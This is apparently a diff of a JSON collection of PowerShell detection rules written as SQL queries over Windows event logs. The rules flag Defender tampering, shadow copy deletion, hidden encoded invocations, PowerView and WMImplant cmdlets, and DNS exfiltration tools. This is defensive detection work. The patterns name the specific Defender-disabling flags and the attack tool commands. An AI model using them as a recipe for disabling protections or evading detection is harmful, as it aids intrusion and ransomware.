(Nextron Systems)", + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1055", - "attack.execution", - "attack.t1059.001" + "attack.t1574.011" ], "falsepositives": [ - "Unknown" + "Rare intended use of hidden services", + "Rare FP could occur due to the non linearity of the ScriptBlockText log" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%AAAAYInlM%' ESCAPE '\\' AND (ScriptBlockText LIKE '%OiCAAAAYInlM%' ESCAPE '\\' OR ScriptBlockText LIKE '%OiJAAAAYInlM%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" ], - "filename": "posh_ps_shellcode_b64.yml" + "filename": "posh_ps_using_set_service_to_hide_services.yml" }, { "title": "PSAsyncShell - Asynchronous TCP Reverse Shell", @@ -4019,52 +3939,32 @@ "filename": "posh_ps_psasyncshell.yml" }, { - "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", - "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "title": "PowerShell ADRecon Execution", + "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", "status": "experimental", - "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" - ], - "filename": "posh_ps_tamper_defender_remove_mppreference.yml" - }, - { - "title": "Clearing Windows Console History", - "id": "bde47d4b-9987-405c-94c7-b080410e8ea7", - "status": "test", - "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", - "author": "Austin Songer @austinsonger", + "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1070.003" + "attack.discovery", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Clear-History%' ESCAPE '\\' OR ((ScriptBlockText LIKE '%Remove-Item%' ESCAPE '\\' OR ScriptBlockText LIKE '%rm%' ESCAPE '\\') AND (ScriptBlockText LIKE '%ConsoleHost\\_history.txt%' ESCAPE '\\' OR ScriptBlockText LIKE '%(Get-PSReadlineOption).HistorySavePath%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" ], - "filename": "posh_ps_clearing_windows_console_history.yml" + "filename": "posh_ps_adrecon_execution.yml" }, { - "title": "PowerShell ADRecon Execution", - "id": "bf72941a-cba0-41ea-b18c-9aca3925690d", - "status": "experimental", - "description": "Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7", - "author": "Bhabesh Raj", + "title": "Malicious ShellIntel PowerShell Commandlets", + "id": "402e1e1d-ad59-47b6-bf80-1ee44985b3a7", + "status": "test", + "description": "Detects Commandlet names from ShellIntel exploitation scripts.", + "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", "tags": [ - "attack.discovery", "attack.execution", "attack.t1059.001" ], @@ -4073,9 +3973,9 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Function Get-ADRExcelComOb%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ADRDomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%ADRecon-Report.xlsx%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-GPOLinks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Potato%' ESCAPE '\\'))" ], - "filename": "posh_ps_adrecon_execution.yml" + "filename": "posh_ps_shellintel_malicious_commandlets.yml" }, { "title": "Potential WinAPI Calls Via PowerShell Scripts", @@ -4098,1569 +3998,1501 @@ "filename": "posh_ps_accessing_win_api.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Suspicious PowerShell Invocations - Generic", + "id": "ed965133-513f-41d9-a441-e38076a0798f", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", - "author": "frack113", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate script" + "Very special / sneaky PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_susp_invocation_generic.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Tamper Windows Defender Remove-MpPreference - ScriptBlockLogging", + "id": "ae2bdd58-0681-48ac-be7f-58ab4e593458", + "status": "experimental", + "description": "Detects attempts to remove windows defender configuration using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR ScriptBlockText LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR ScriptBlockText LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_tamper_defender_remove_mppreference.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "title": "WMImplant Hack Tool", + "id": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "description": "Detects parameters used by WMImplant", + "author": "NVISO", "tags": [ - "attack.exfiltration", - "attack.t1048", "attack.execution", + "attack.t1047", "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Administrative scripts that use the same keywords." ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%WMImplant%' ESCAPE '\\' OR ScriptBlockText LIKE '% change\\_user %' ESCAPE '\\' OR ScriptBlockText LIKE '% gen\\_cli %' ESCAPE '\\' OR ScriptBlockText LIKE '% command\\_exec %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% disable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_wdigest %' ESCAPE '\\' OR ScriptBlockText LIKE '% enable\\_winrm %' ESCAPE '\\' OR ScriptBlockText LIKE '% registry\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% remote\\_posh %' ESCAPE '\\' OR ScriptBlockText LIKE '% sched\\_job %' ESCAPE '\\' OR ScriptBlockText LIKE '% service\\_mod %' ESCAPE '\\' OR ScriptBlockText LIKE '% process\\_kill %' ESCAPE '\\' OR ScriptBlockText LIKE '% active\\_users %' ESCAPE '\\' OR ScriptBlockText LIKE '% basic\\_info %' ESCAPE '\\' OR ScriptBlockText LIKE '% power\\_off %' ESCAPE '\\' OR ScriptBlockText LIKE '% vacant\\_system %' ESCAPE '\\' OR ScriptBlockText LIKE '% logon\\_events %' ESCAPE '\\'))" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_wmimplant.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "title": "Execution via CL_Mutexverifiers.ps1", + "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" }, { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "status": "experimental", + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "Tim Rauch", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%gcim%' ESCAPE '\\') AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%rwmi%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-CimInstance%' ESCAPE '\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Tamper Windows Defender - PSClassic", + "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", + "author": "frack113", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SY%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_service_dacl_modification_set_service.yml" + "filename": "posh_pc_tamper_with_windows_defender.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service - PS", - "id": "953945c5-22fe-4a92-9f8a-a9edc1e522da", - "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote PowerShell Session (PS Classic)", + "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "status": "test", + "description": "Detects remote PowerShell sessions", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%DCLCWPDTSD%' ESCAPE '\\' AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\'))" - ], - "filename": "posh_ps_using_set_service_to_hide_services.yml" - }, - { - "title": "Powershell Install a DLL in System Directory", - "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", - "status": "experimental", - "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", - "author": "frack113, Nasreddine Bencherchali", - "tags": [ - "attack.credential_access", - "attack.t1556.002" - ], - "falsepositives": [ - "Unknown" + "Legitimate use remote PowerShell sessions" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" ], - "filename": "posh_ps_copy_item_system_directory.yml" + "filename": "posh_pc_remote_powershell_session.yml" }, { - "title": "AMSI Bypass Pattern Assembly GetType", - "id": "e0d6c087-2d1c-47fd-8799-3904103c5a98", - "status": "experimental", - "description": "Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "test", + "description": "Detects PowerShell called from an executable by the 